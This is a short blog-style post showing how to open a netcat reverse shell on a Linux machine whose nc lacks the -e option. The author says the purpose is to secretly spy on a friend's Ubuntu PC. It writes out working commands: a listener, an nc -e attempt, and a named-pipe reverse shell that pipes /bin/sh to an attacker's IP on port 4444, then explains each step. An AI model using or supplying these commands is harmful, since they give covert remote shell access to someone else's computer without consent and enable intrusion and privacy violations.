Creating a netcat reverse shell without -e
So it all began when one day I was just thinking to spy on my friend’s Ubuntu pc to check what kind stuff he has (obviously NSFW stuff )
So my first approach was to set a Netcat reverse proxy shell but I was greeted with an error of
nc -e /bin/sh 192.168.0.83 4444
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]
[destination] [port]and it was kinda like WHAAAAAAATTTTTT!!!!!!!!!!!
I know kinda overkill reaction
so I wandered off the wild cyberspace for my answer ,
but all I got was failure
As in the traditional Netcat, if the well-named GAPING_SECURITY_HOLE option isn't defined in the Netcat source when it is compiled, your resulting Netcat executable won't support -e
So what now , do I have to loss my hope to spy on my friend or try hard
So after a time , I found way which uses netcat relay as it will relay the victim shell to the attacker netcat client
So here it goes
Before anything start the attacker netcat listener
nc -nvlp 4444Now in the victim pc
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attacker_ip 4444 1>/tmp/backpipeand voila
So how it works
Here, I’ve first created a named pipe (AKA FIFO) called backpipe using the mknod command. The mknod command will create things in the file system, and here I’m creating something called “backpipe” that is of type “p”, which is a named pipe. This FIFO will be used to shuttle data back to our shell’s input. I created my backpipe in /tmp because pretty much any account is allowed to write there.
Then, I invoke my shell (/bin/sh), the most common shell available on all kinds of Linux distros , pulling its Standard Input from the backpipe (0</tmp/backpipe). I pipe the output of /bin/sh (|) to my Netcat client. That Netcat client connects to the attacker client on port 4444 (nc attacker_ip 4444). I then take Netcat’s Standard Output and dump it into the backpipe (1>/tmp/backpipe). On most shells, you can dispense with the 0< and 1> syntax, but on occasion, I’ve seen some weird shells where it doesn’t work unless you use 0< and 1>. I always throw them in, just to make sure it’ll work.
That’s all
Source : https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/
